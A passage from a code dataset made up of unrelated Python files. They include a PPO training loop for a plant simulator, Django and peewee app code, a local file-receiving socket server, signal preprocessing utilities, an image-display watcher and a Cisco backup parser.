5\n            self.CNS.reset(initial_nub=1, mal=True, mal_case=36, mal_opt=size, mal_time=maltime)\n            print(f'DONE initial {size}, {maltime}')\n\n            # Get iter\n            
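# self.mem is an mp.Manager() dict shared by every Agent process, so this read-then-increment is not atomic.\n            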
self.CurrentIter = self.mem['Iter']\n            self.mem['Iter'] += 1\n            # Diagnosis-module tester!\n            if self.CurrentIter != 0 and self.CurrentIter % 15 == 0:\n                print(self.CurrentIter, 'Yes Test')\n                self.PrognosticMode = True\n            else:\n                print(self.CurrentIter, 'No Test')\n                self.PrognosticMode = False\n\n            # Initial\n            done = False\n            self.InitialStateSet()\n\n            # clear the previous GP data\n            [self.ax_dict[i_].clear() for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]]\n\n            while not done:\n                fulltime = 15\n                t_max = 5  # total iteration = fulltime * t_max\n                tun = [1000, 100, 100, 1, 1]\n                ro = [1, 1, 1, 2, 2]\n                ProgRecodBox = {\"ZINST58\": [], \"ZINST63\": [], \"ZVCT\": [], \"BFV122\": [], \"BPV145\": []}  # reset the recorder\n                if self.PrognosticMode:\n                    # Test Mode\n                    for t in range(self.W.TimeLeg):\n                        self.CNS.run_freeze_CNS()\n                        self.MakeStateSet()\n                        [ProgRecodBox[i_].append(round(self.CNS.mem[i_]['Val'], r_)/t_) for i_, t_, r_ in zip(ProgRecodBox.keys(), tun, ro)]\n\n                    for __ in range(fulltime*t_max):  # total iteration\n                        if __ != 0 and __ % 10 == 0:  # predict every 10 steps\n                            # copy self.S_Py, self.S_Comp\n                            copySPy, copySComp = self.S_Py, self.S_Comp\n                            copyRecodBox = {\"ZINST58\": [], \"ZINST63\": [], \"ZVCT\": [], \"BFV122\": [], \"BPV145\": []}  # reset the recorder\n                            # TOOL.ALLP(copyRecodBox[\"ZINST58\"], \"CopySPy\")\n                            for PredictTime in range(__, fulltime*t_max):  # the prediction horizon shrinks as time passes.\n                                # start prediction\n                                save_ragular_para = {_: 0 for _ in range(self.LocalNet.NubNET)}\n                                for nubNet in range(0, self.LocalNet.NubNET):\n                                    NetOut = self.LocalNet.NET[nubNet].GetPredictActorOut(x_py=copySPy, x_comp=copySComp)\n                                    NetOut = NetOut.view(-1)  # (1, 2) -> (2, )\n                                    act_ = NetOut.argmax().item()  # take the argmax of the row and return its value\n                                    if nubNet < 4:\n                                        save_ragular_para[nubNet] = (act_ - 10)/10  # turn act_ into an increment/decrement of the value\n                                    else:\n                                        save_ragular_para[nubNet] = (act_ - 100)/100  # turn act_ into an increment/decrement of the value\n                                # TOOL.ALLP(save_ragular_para, \"PARA\")\n\n                                # append the values to copySPy and copySComp\n                                # copySpy\n                                copySPyLastVal = copySPy[:, :, -1:]  # [1, 3, 10] -> [1, 3, 1] take the last value.\n                                copySPyLastVal = copySPyLastVal + tensor([[\n                                    [save_ragular_para[0]/1000], [save_ragular_para[1]/100], [save_ragular_para[2]/100]\n                                ]])  # add the predicted delta to the last value.\n                                copySPy = torch.cat((copySPy, copySPyLastVal), dim=2)  # append the value to the original tensor.\n                                copySPy = copySPy[:, :, 1:]  # drop the oldest entry.\n                                # copySComp\n                                copySCompLastVal = copySComp[:, :, -1:]  # [1, 3, 10] -> [1, 3, 1] take the last value.\n                                # unlike copySPy, copySComp keeps using the previous control values as they are.\n\n                                # copySCompLastVal = copySCompLastVal + tensor([[\n                                #     [save_ragular_para[3]], [save_ragular_para[4]],\n                                # ]])  # add the predicted delta to the last value.\n\n                                #TODO\n                                # use the predicted value itself\n                                copySCompLastVal = tensor([[[save_ragular_para[3]], [save_ragular_para[4]]]])\n\n                                copySComp = torch.cat((copySComp, copySCompLastVal), dim=2)  # append the value to the original tensor.\n                                copySComp = copySComp[:, :, 1:]  # drop the oldest entry.\n                                # record the results\n                                copyRecodBox[\"ZINST58\"].append(copySPyLastVal[0, 0, 0].item())\n                                copyRecodBox[\"ZINST63\"].append(copySPyLastVal[0, 1, 0].item())\n                                copyRecodBox[\"ZVCT\"].append(copySPyLastVal[0, 2, 0].item())\n\n                                copyRecodBox[\"BFV122\"].append(copySComp[0, 0, 0].item())\n                                copyRecodBox[\"BPV145\"].append(copySComp[0, 1, 0].item())\n                            # prediction finished; plot the recorded results\n                            [self.ax_dict[i_].plot(ProgRecodBox[i_] + copyRecodBox[i_],\n                                                   label=f\"{i_}_{__}\") for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]]\n\n                        # plt.show()\n                        # CNS + 1 Step\n                        self.CNS.run_freeze_CNS()\n                        self.MakeStateSet()\n                        [ProgRecodBox[i_].append(round(self.CNS.mem[i_]['Val'], r_)/t_) for i_, t_, r_ in zip(ProgRecodBox.keys(), tun, ro)]\n\n                    # END Test Mode CODE\n                    [self.ax_dict[i_].grid() 
for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]]\n                    [self.ax_dict[i_].legend() for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]]\n                    [self.fig_dict[i_].savefig(f\"{self.CurrentIter}_{i_}.png\") for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]]\n                    print('END TEST')\n\n                else:\n                    # Train Mode\n                    for t in range(self.W.TimeLeg):\n                        self.CNS.run_freeze_CNS()\n                        self.MakeStateSet()\n\n                    for __ in range(fulltime):\n                        spy_lst, scomp_lst, a_lst, r_lst = [], [], [], []\n                        a_dict = {_: [] for _ in range(self.LocalNet.NubNET)}\n                        mu_dict = {_: [] for _ in range(self.LocalNet.NubNET)}\n\n                        a_now = {_: 0 for _ in range(self.LocalNet.NubNET)}\n                        a_prob = {_: [] for _ in range(self.LocalNet.NubNET)}\n                        r_dict = {_: [] for _ in range(self.LocalNet.NubNET)}\n                        done_dict = {_: [] for _ in range(self.LocalNet.NubNET)}\n                        #\n                        trag_mu = {_: [] for _ in range(self.LocalNet.NubNET)}\n                        # Sampling\n                        for t in range(t_max):\n                            NetOut_dict = {_: 0 for _ in range(self.LocalNet.NubNET)}\n                            for nubNet in [0, 2]:\n                                TOOL.ALLP(self.S_Py, 'S_Py')\n                                TOOL.ALLP(self.S_Comp, 'S_Comp')\n                                # TODO\n                                # networks 0 and 2 are the actor nets\n                                mu_v = self.LocalNet.NET[nubNet].GetPredictActorOut(x_py=self.S_Py, x_comp=self.S_Comp)\n                                mu = mu_v.data.numpy()  # return as numpy after detach\n                                TOOL.ALLP(mu, \"Mu\")\n                                # select an action\n                                logstd = self.LocalNet.NET[nubNet].logstd.data.numpy()\n                                act = mu + np.exp(logstd) * np.random.normal(size=logstd.shape)\n                                act = np.clip(act, 0, 1)\n                                TOOL.ALLP(act, \"ACT\")  # (1, 3) or (1, 2)\n                                # store the action and mu\n                                a_dict[nubNet].append(act)\n                                mu_dict[nubNet].append(mu)\n                                NetOut_dict[nubNet] = act[0]  # action DIS for the current state, (3,) or (2,)\n\n                            # store the state\n                            spy_lst.append(self.S_Py.tolist()[0])  # (1, 2, 10) -list> (2, 10)\n                            scomp_lst.append(self.S_Comp.tolist()[0])  # (1, 2, 10) -list> (2, 10)\n\n                            # old val to compare the new val\n                            ComparedPara = [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]\n                            ComparedParaRound = [1, 1, 1, 2, 2]\n                            self.old_cns = {para: round(self.CNS.mem[para]['Val'], pr) for para, pr in zip(ComparedPara,ComparedParaRound)}\n\n                            # CNS + 1 Step\n                            self.CNS.run_freeze_CNS()\n                            self.MakeStateSet()\n                            self.new_cns = {para: round(self.CNS.mem[para]['Val'], pr) for para, pr in zip(ComparedPara,ComparedParaRound)}\n\n                            # compute the rewards and the termination condition\n                            r = {_: 0 for _ in range(self.LocalNet.NubNET)}\n                            pa = {_: 0 for _ in range(self.LocalNet.NubNET)}\n\n                            for nubNet in range(0, self.LocalNet.NubNET):  # compute and store the reward per network\n                                if nubNet == 0 or nubNet == 1:\n                                    # TODO\n                                    # work still needed from here on.\n                                    r[nubNet] = 1\n                                elif nubNet == 2 or nubNet == 3:\n                                    pass\n                                r_dict[nubNet].append(r[nubNet])\n\n                                # compute the termination condition\n                                if __ == 14 and t == t_max-1:\n                                    done_dict[nubNet].append(0)\n                                    done = True\n                                else:\n                                    done_dict[nubNet].append(1)\n\n                            def dp_want_val(val, name):\n                                return f\"{name}: {self.CNS.mem[val]['Val']:4.4f}\"\n\n                            print(self.CurrentIter, f\"{r[0]:4}|{r[1]:4}|{r[2]:4}|{r[3]:4}|{r[4]:6}|{r[5]:6}|\",\n                                  f'{NetOut_dict[0]:0.4f}', f'{NetOut_dict[1]:0.4f}',\n                                  f'{NetOut_dict[2]:0.4f}', f'{NetOut_dict[3]:0.4f}',\n                                  f'{NetOut_dict[4]:0.4f}', f'{NetOut_dict[5]:0.4f}',\n                                  f\"TIME: {self.CNS.mem['KCNTOMS']['Val']:5}\",\n                                  # dp_want_val('PVCT', 'VCT pressure'),\n                                  f\"VCT Level: {self.new_cns['ZVCT']}\",\n                                  f\"{self.old_cns['ZVCT'] + pa[1]:5.2f} + {pa[1]:5.2f}\",\n                                  f\"PZR pre: {self.new_cns['ZINST58']}\",\n                                  f\"{self.old_cns['ZINST58'] + pa[2]:5.2f} + {pa[2]:5.2f}\",\n                                  f\"PZR Level: {self.new_cns['ZINST63']}\",\n                                  f\"{self.old_cns['ZINST63'] + pa[3]:5.2f} + {pa[3]:5.2f}\",\n                                  f\"BFV122: {self.new_cns['BFV122']}\",\n                                  f\"{self.new_cns['BFV122'] + pa[4]:5.2f} + {pa[4]:5.2f}\",\n                                  f\"BPV145: 
{self.new_cns['BPV145']}\",\n                                  f\"{self.new_cns['BPV145'] + pa[5]:5.2f} + {pa[5]:5.2f}\",\n                                  # dp_want_val('UPRT', 'PRT temp'), dp_want_val('ZINST48', 'PRT pressure'),\n                                  # dp_want_val('ZINST36', 'Let-down flow'), dp_want_val('BFV122', 'Charging Valve pos'),\n                                  # dp_want_val('BPV145', 'Let-down Valve pos'),\n                                  )\n\n                        # ==================================================================================================\n                        # Train\n\n                        gamma = 0.98\n                        lmbda = 0.95\n\n                        # 1 .. 10\n                        spy_batch = torch.tensor(spy_lst, dtype=torch.float)\n                        scomp_batch = torch.tensor(scomp_lst, dtype=torch.float)\n                        # 2 .. 10 + (1 Last value)\n                        spy_lst.append(self.S_Py.tolist()[0])\n                        scomp_lst.append(self.S_Comp.tolist()[0])\n                        spy_fin = torch.tensor(spy_lst[1:], dtype=torch.float)\n                        scomp_fin = torch.tensor(scomp_lst[1:], dtype=torch.float)\n\n                        # compute the advantage for each network\n                        for nubNet in range(0, self.LocalNet.NubNET):\n                            # GAE\n                            # r_dict[nubNet]: (5,) -> (5,1)\n                            # Netout : (5,1)\n                            # done_dict[nubNet]: (5,) -> (5,1)\n                            td_target = torch.tensor(r_dict[nubNet], dtype=torch.float).view(t_max, 1) + \\\n                                        gamma * self.LocalNet.NET[nubNet].GetPredictCrticOut(spy_fin, scomp_fin) * \\\n                                        torch.tensor(done_dict[nubNet], dtype=torch.float).view(t_max, 1)\n                            delta = td_target - self.LocalNet.NET[nubNet].GetPredictCrticOut(spy_batch, scomp_batch)\n                            delta = delta.detach().numpy()\n\n                            adv_list = []\n                            adv_ = 0.0\n                            for reward in delta[::-1]:\n                                adv_ = gamma * adv_ * lmbda + reward[0]\n                                adv_list.append([adv_])\n                            adv_list.reverse()\n                            adv = torch.tensor(adv_list, dtype=torch.float)\n\n                            PreVal = self.LocalNet.NET[nubNet].GetPredictActorOut(spy_batch, scomp_batch)\n                            PreVal = PreVal.gather(1, torch.tensor(a_dict[nubNet]))  # PreVal_a\n                            # TOOL.ALLP(PreVal, f\"Preval {nubNet}\")\n\n                            # compute the ratio a/b == exp(log(a) - log(b))\n                            # TOOL.ALLP(a_prob[nubNet], f\"a_prob {nubNet}\")\n                            Preval_old_a_prob = torch.tensor(a_prob[nubNet], dtype=torch.float)\n                            ratio = torch.exp(torch.log(PreVal) - torch.log(Preval_old_a_prob))\n                            # TOOL.ALLP(ratio, f\"ratio {nubNet}\")\n\n                            # surr1, 2\n                            eps_clip = 0.1\n                            surr1 = ratio * adv\n                            surr2 = torch.clamp(ratio, 1 - eps_clip, 1 + eps_clip) * adv\n\n                            min_val = torch.min(surr1, surr2)\n                            smooth_l1_loss = nn.functional.smooth_l1_loss(self.LocalNet.NET[nubNet].GetPredictCrticOut(spy_batch, scomp_batch), td_target.detach())\n\n                            loss = - min_val + smooth_l1_loss\n\n                            self.LocalOPT.NETOPT[nubNet].zero_grad()\n                            loss.mean().backward()\n                            for global_param, local_param in zip(self.GlobalNet.NET[nubNet].parameters(),\n                                                                 self.LocalNet.NET[nubNet].parameters()):\n                                global_param._grad = local_param.grad\n                            self.LocalOPT.NETOPT[nubNet].step()\n                            self.LocalNet.NET[nubNet].load_state_dict(self.GlobalNet.NET[nubNet].state_dict())\n\n                            # TOOL.ALLP(advantage.mean())\n                            # print(self.CurrentIter, 'AgentNub: ', nubNet,\n                            #       'adv: ', adv.mean().item(), 'loss: ', loss.mean().item(),\n                            #       '= - min_val(', min_val.mean().item(), ') + Smooth(', smooth_l1_loss.mean().item(), ')')\n\n                print('DONE EP')\n                break\n\n\nif __name__ == '__main__':\n    W_info = Work_info()\n    GlobalModel = NETBOX()\n    [GlobalModel.NET[_].share_memory() for _ in range(0, GlobalModel.NubNET)]  # put the nets into shared memory\n\n    # Make shared mem\n    MEM = mp.Manager().dict(W_info.WInfoWarp())\n\n    workers = []\n    for cnsip, com_port, max_iter in zip(W_info.CNS_IP_LIST, W_info.CNS_PORT_LIST, W_info.CNS_NUMBERS):\n        if max_iter != 0:\n            for i in range(1, max_iter + 1):\n                workers.append(Agent(GlobalNet=GlobalModel,\n                                     MEM=MEM,\n                                     CNS_ip=cnsip, CNS_port=com_port + i,\n                                     Remote_ip=W_info.CURNET_COM_IP, Remote_port=com_port + 
i))\n\n [_.start() for _ in workers]\n [_.join() for _ in workers]","sub_path":"AB_PPO/V4_3_Main.py","file_name":"V4_3_Main.py","file_ext":"py","file_size_in_byte":21340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"251528658","text":"\"\"\"All the data models for the Hack Club Secret Santa\"\"\"\nfrom peewee import *\nimport datetime\n\nDB = MySQLDatabase(\"santa\")\n\nclass Base(Model):\n \"\"\"Base PeeWee model to assign the proper metaclass\"\"\"\n class Meta:\n database = DB\n\nclass Address(Base):\n \"\"\"PeeWee model to represent a physical address\"\"\"\n house_number = IntegerField()\n street_name = CharField()\n city = CharField()\n state = CharField()\n country = CharField()\n zip_code = IntegerField()\n \nclass Recipient(Base):\n \"\"\"PeeWee model to represent the recipient/giver of a gift\"\"\"\n registered_at = DateTimeField(default=datetime.datetime.now)\n address = ForeignKeyField(Address, related_name=\"recipient\")\n wish_list = TextField()\n shopping = BooleanField()\n being_shopped_for = BooleanField()","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"82403026","text":"import datetime\n\nfrom django.test import TestCase\n\nfrom pdl.models import Proyecto, Seguimientos, Expedientes\nfrom seguimientos import utils\n\n\nclass Object(object):\n \"\"\"Dummy class for testing.\"\"\"\n pass\n\n\nclass TestSeguimientos(TestCase):\n def setUp(self):\n proyecto = Proyecto(**{\n \"numero_proyecto\": \"02764/2013-CR\",\n \"codigo\": \"02764\",\n \"legislatura\": 2011,\n \"short_url\": \"4zhube\",\n \"titulo\": \"Propone Ley Universitaria\",\n \"iniciativas_agrupadas\": ['01790', '01800'],\n \"fecha_presentacion\": \"2010-10-10\",\n \"id\": 1,\n })\n proyecto.save()\n\n seguimiento1 = {\n 'fecha': '2013-10-14',\n 'evento': 'Decretado a... 
Educación, Juventud y Deporte',\n            'proyecto': proyecto,\n        }\n        seguimiento2 = {\n            'fecha': '2013-10-15',\n            'evento': 'En comisión Educación, Juventud y Deporte',\n            'proyecto': proyecto,\n        }\n        b = Seguimientos(**seguimiento1)\n        b.save()\n        b = Seguimientos(**seguimiento2)\n        b.save()\n\n        expediente1 = seguimiento1  # Expediente and Seguimiento carry almost the same fields\n        expediente2 = seguimiento2  # Expediente and Seguimiento carry almost the same fields\n        b = Expedientes(**expediente1)\n        b.save()\n        b = Expedientes(**expediente2)\n        b.save()\n\n    def test_get_proyecto_from_short_url(self):\n        short_url = \"4zhube\"\n        expected = {\n            \"numero_proyecto\": \"02764/2013-CR\",\n            \"codigo\": \"02764\",\n            \"titulo\": \"Propone Ley Universitaria\",\n            \"iniciativas_agrupadas\": \"['01790', '01800']\",\n        }\n        result = utils.get_proyecto_from_short_url(short_url)\n        self.assertEqual(expected['codigo'], result.codigo)\n        self.assertEqual(expected['iniciativas_agrupadas'],\n                         result.iniciativas_agrupadas)\n\n    def test_get_proyecto_from_short_url_from_string(self):\n        proyecto = Proyecto(**{\n            \"numero_proyecto\": \"02764/2013-CR\",\n            \"codigo\": \"02764\",\n            \"short_url\": \"4zhube\",\n            \"legislatura\": 2011,\n            \"titulo\": \"Propone Ley Universitaria\",\n            \"iniciativas_agrupadas\": '{01790,01800}',\n            \"fecha_presentacion\": \"2010-10-10\",\n            \"time_created\": datetime.date.today(),\n            \"id\": 1,\n        })\n        proyecto.save()\n        short_url = \"4zhube\"\n        expected = ['01790', '01800']\n        result = utils.get_proyecto_from_short_url(short_url)\n        self.assertEqual(expected, result.iniciativas_agrupadas)\n\n    def test_hiperlink_congre(self):\n        congresista = 'Gamarra Saldivar, Teofilo'\n        expected = \"Gamarra Saldivar, Teofilo\"\n        result = utils.hiperlink_congre(congresista)\n        self.assertEqual(expected, result)\n\n    def test_convert_name_to_slug(self):\n        congresista = \"Gamarra Saldivar, Teofilo\"\n        expected = \"gamarra_saldivar_teofilo/\"\n        result = utils.convert_name_to_slug(congresista)\n        self.assertEqual(expected, result)\n\n    def test_get_events_from_expediente(self):\n        result = utils.get_events_from_expediente('1')\n        expected = '15 Oct, 2013'\n        self.assertEqual(expected, result[0].fecha)\n","sub_path":"proyectos_de_ley/seguimientos/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"317076754","text":"import socket\n\nsockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsockfd.bind((\"127.0.0.1\", 22385))\nsockfd.listen(5)\nprint(\"Please Wait....\")\nconnfd, addr = sockfd.accept()\nprint(\"Connect from\", addr)  # print the address of the connecting client\nsave = open(\"save.jpg\", \"wb\")\n\ncount = 0\nwhile True:\n    data = connfd.recv(4096)\n    if not data:\n        print(\"接收完毕\")\n        break\n    save.write(data)\n    count += 1\n    print(\"收到数据:%d\" % count)\n\nn = connfd.send(\"收到,over\".encode())  # send the byte string\nprint(\"发送%d字节\" % n)\n\nconnfd.close()\nsockfd.close()\n","sub_path":"part_02_system_programming/part_2_2_IO/day6/tcp_flie_recv.py","file_name":"tcp_flie_recv.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"149056549","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import TodoListView, TodoDetailView, TodoCreateView, TodoUpdateView, TodoDeleteView\n\napp_name = 'todoclass'\nurlpatterns = [\n    path('', TodoListView.as_view(), name='list'),\n    path('create/', TodoCreateView.as_view(), name='create'),\n    path('<int:pk>/', 
TodoDetailView.as_view(), name='detail'),\n    path('<int:pk>/update/', TodoUpdateView.as_view(), name='update'),\n    path('<int:pk>/delete/', TodoDeleteView.as_view(), name='delete'),\n]\n","sub_path":"todoclass/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"24621745","text":"import numpy as np\nfrom scipy import signal\nfrom sklearn import linear_model\n\ndef select_angular_range(angle, angular_range=(26, 30), tol=1e-4):\n    min_angle, max_angle = angular_range\n\n    id_angle = (angle - min_angle >= -tol) & (angle - max_angle <= tol)\n\n    return id_angle\n\ndef trim_angular_range(angle, pattern, angular_range=(26, 30), tol=1e-4):\n\n    if angular_range is None:\n        return angle, pattern\n\n    id_angle = select_angular_range(angle, angular_range=angular_range, tol=tol)\n\n    return angle[id_angle], pattern[...,id_angle]\n\ndef detrend_pattern(angle, pattern, support=None, return_bias=False):\n\n    reg = linear_model.BayesianRidge()\n\n    if support is not None:\n        reg.fit(angle[support,None], pattern[support])\n    else:\n        mean_intensity = np.mean(np.abs(pattern))\n        std_intensity = np.std(np.abs(pattern))\n        support = np.abs(pattern) < mean_intensity + 2*std_intensity\n\n        reg.fit(angle[support,None], pattern[support])\n\n    bias = reg.predict(angle[:,None])\n\n    if return_bias:\n        return pattern - bias, bias\n    else:\n        return pattern - bias\n\ndef detrend_dataset(angle, X):\n    XX = []\n    for x in X:\n        mean_intensity = np.mean(np.abs(x))\n        std_intensity = np.std(np.abs(x))\n        support = np.abs(x) < mean_intensity + 2*std_intensity\n        pattern, bias = detrend_pattern(angle, x, support=support, return_bias=True)\n        XX.append(pattern)\n    return np.array(XX)\n\ndef smooth_patterns(patterns, order=2, Wn=0.025, clip=True):\n    \"\"\" apply a lowpass filter to suppress noise, with optional clipping to zero \"\"\"\n\n    b, a = signal.butter(order, Wn, analog=False)\n    XXclip = signal.filtfilt(b, a, patterns, axis=-1)\n\n    if clip:\n        XXclip = np.clip(XXclip, 0.0, 9999)\n\n    return XXclip\n","sub_path":"VNbO2/data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"21254528","text":"# O(n) time | O(1) space\n# where n is the length of the array\n#\ndef longestPeak(array):\n    longestPeakLength = 0\n    i = 1\n\n    while i < len(array) - 1:\n        isPeak = array[i] > array[i - 1] and array[i] > array[i + 1]\n        if isPeak == False:\n            i += 1\n            continue\n\n        # left\n        left = i - 2\n        while left >= 0 and array[left] < array[left + 1]:\n            left -= 1\n\n        # right\n        right = i + 2\n        while right < len(array) and array[right] < array[right - 1]:\n            right += 1\n\n        currentPeak = right - left - 1\n        longestPeakLength = max(currentPeak, longestPeakLength)\n\n        i = right\n\n    return longestPeakLength\n\nif __name__ == '__main__':\n    array = [ 1, 2, 3, 3, 4, 0, 10, 6, 5, -1, -3, 2, 3 ]\n    print(longestPeak(array))\n","sub_path":"algoexpert/medium/python/longest_peak.py","file_name":"longest_peak.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"426587665","text":"import re\ndef clean_text(data, target):\n\n    if data:\n        val = data.replace(target, \"\").strip()\n        val = re.sub(r'[^\\w\\s]', \" \", val)\n        val = re.sub(r'[\\_]', \" \", val)\n        digit_clean = [w for w in val.split() if not w.isdigit()]\n        single_letter_clean = ' '.join([w for w in 
digit_clean if len(w)>2])\n return single_letter_clean.strip().lower()\n else:\n return \"NULL\"","sub_path":"preprocessing/text_processing.py","file_name":"text_processing.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"233242705","text":"#!/usr/bin/python3\n# image_display.py\n# 5/21/2020\n# Aidan Gray\n# aidan.gray@idg.jhu.edu\n#\n# This Python script uses the Watchdog library to monitor the selected directory\n# for newly created FITS files\n\nimport time\nimport logging\nimport sys\nimport pyds9\nimport os\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\n#from trius_cam_server import *\n\n#### DS9 Image Display Parameters ####################\nCMAP = '3 0.1' # first number is the contrast, second is bias\nSHOW_RAW = True # display raw images\nSHOW_PRC = True # display processed images\n######################################################\n\ndef log_start():\n \"\"\"\n Create a logfile that the rest of the script can write to.\n\n Output:\n - log \tObject used to access write abilities\n \"\"\"\n\n scriptDir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n scriptName = os.path.splitext(os.path.basename(__file__))[0]\n log = logging.getLogger('file-watch')\n hdlr = logging.FileHandler(scriptDir+'/logs/'+scriptName+'.log')\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n hdlr.setFormatter(formatter)\n log.addHandler(hdlr)\n log.setLevel(logging.INFO)\n return log\n\ndef on_created(event):\n \"\"\"\n Sends the new FITS file path to the DS9 open\n\n Input:\n - event The triggered event, containing the filename\n \"\"\"\n global d\n log.info(f\"Created: {event.src_path}\")\n d.set(\"frame clear\")\n d.set(\"file \"+event.src_path)\n time.sleep(1)\n d.set(\"zoom to fit\")\n \nif __name__ == \"__main__\":\n path = sys.argv[1]\n log = log_start()\n try:\n d = pyds9.DS9()\n except:\n print(repr(sys.exc_info()[0])+' '+repr(sys.exc_info()[1])+' '+repr(sys.exc_info()[2]))\n #d = pyds9.DS9()\n\n d.set(\"cmap \"+CMAP)\n\n if SHOW_RAW and SHOW_PRC:\n patterns = [path+\"*.fits\"]\n ignore_patterns = []\n elif SHOW_RAW and not SHOW_PRC:\n patterns = [path+\"raw-*\"]\n ignore_patterns = [path+\"prc-*\"]\n elif not SHOW_RAW and SHOW_PRC:\n patterns = [path+\"prc-*\"]\n ignore_patterns = [path+\"raw-*\"]\n else:\n patterns = []\n ignore_patterns = []\n\n ignore_directories = True\n case_sensitive = True\n\n my_event_handler = PatternMatchingEventHandler(patterns, ignore_patterns, ignore_directories, case_sensitive)\n my_event_handler.on_created = on_created\n go_recursively = True\n\n my_observer = Observer()\n my_observer.schedule(my_event_handler, path, recursive=go_recursively)\n\n my_observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n my_observer.stop()\n my_observer.join()\n","sub_path":"tools/image_display.py","file_name":"image_display.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"512349541","text":"#!usr/bin/env python\r\nimport datetime\r\nimport os\r\nimport re\r\nimport sys\r\nsys.path.append('/anonymised/path')\r\nimport jsoncommands\r\n\r\n\r\ndef getlcminfo(todaydate, backupdate):\r\n\r\n\t# globals\r\n\r\n\trootdir = '/anonymised/path/' + todaydate\r\n\tendpath = '/anonymised/path.json'\r\n\r\n\t# RegEx\r\n\r\n\tsoftwarepatterns = ['IOS', 'software, version'] # IOS, 
catOS\r\n\tversionpatterns = ['IOS.*Version ([\\w.()]+),?', 'Version NmpSW: ([\\w.()]+)']\r\n\thardwarepatterns = ['Cisco ([\\w./-]+) .* processor', 'Model: ([\\w./-]+)', 'Cisco ([\\w./-]+) .* bytes of memory']\r\n\tspecifichardwarepatterns = ['Cisco [\\w.\\/-]+ [(](.*)[)] processor']\r\n\tserialpatterns = ['System serial number\\s*: (\\w+)', 'Processor board ID (\\w+)',\r\n\t\t\t\t\t 'Hardware Version: .* Model: .* Serial #: (\\w+)']\r\n\tlastrebootpatterns = ['uptime is (.*)', 'Uptime is (.*)']\r\n\r\n\tnewjson = {}\r\n\r\n\tsources = os.listdir(rootdir)\r\n\tfound = 0\r\n\tnotfound = 0\r\n\r\n\tfor source in sources:\r\n\t\tsourcedir = rootdir + os.sep + source\r\n\t\tnewjson[source] = []\r\n\t\tfilelist = os.listdir(sourcedir)\r\n\t\tfor file in filelist:\r\n\t\t\tfound += 1\r\n\t\t\thostname = file.split('.')[1].upper()\r\n\t\t\tipaddr = file.split('.')[0].replace('_', '.')\r\n\t\t\tnewdata = {'hostname': hostname, 'software_type': '', 'software_version': '', 'ip_address': ipaddr,\r\n\t\t\t\t\t 'hardware': '', 'hardware_specific': '', 'serial_number': '', 'last_reboot': '', 'uptime': -1,\r\n\t\t\t\t\t 'last_backup': backupdate, 'days_elapsed': 0}\r\n\t\t\tdataloc = sourcedir + os.sep + file\r\n\t\t\twith open(dataloc, 'r') as datafile:\r\n\t\t\t\tdatalines = datafile.readlines()\r\n\t\t\t\tfor dataline in datalines:\r\n\t\t\t\t\tif not newdata['software_type']:\r\n\t\t\t\t\t\tif re.search(softwarepatterns[0], dataline, re.IGNORECASE):\r\n\t\t\t\t\t\t\tnewdata['software_type'] = 'IOS'\r\n\t\t\t\t\t\telif re.search(softwarepatterns[1], dataline, re.IGNORECASE):\r\n\t\t\t\t\t\t\tnewdata['software_type'] = 'CATOS'\r\n\t\t\t\t\tcheckregex(versionpatterns, dataline, 'software_version', newdata)\r\n\t\t\t\t\tcheckregex(hardwarepatterns, dataline, 'hardware', newdata)\r\n\t\t\t\t\tcheckregex(specifichardwarepatterns, dataline, 'hardware_specific', newdata)\r\n\t\t\t\t\tcheckregex(serialpatterns, dataline, 'serial_number', newdata)\r\n\t\t\t\t\tcheckregex(lastrebootpatterns, dataline, 'last_reboot', newdata)\r\n\r\n\t\t\t# handling information\r\n\t\t\textractnum = '(\\d+)'\r\n\r\n\t\t\tif newdata['last_reboot']:\r\n\t\t\t\tfulluptime = newdata['last_reboot'].split(',')\r\n\t\t\t\tnewdata['last_reboot'] = '' # just in case it somehow fails\r\n\t\t\t\ttotaluptime = 0\r\n\t\t\t\tfor uptimepart in fulluptime:\r\n\t\t\t\t\tmagnitude = int(re.search(extractnum, uptimepart).group(1))\r\n\t\t\t\t\tif magnitude:\r\n\t\t\t\t\t\tif 'year' in uptimepart.lower():\r\n\t\t\t\t\t\t\ttotaluptime += magnitude * 365\r\n\t\t\t\t\t\tif 'month' in uptimepart.lower():\r\n\t\t\t\t\t\t\ttotaluptime += 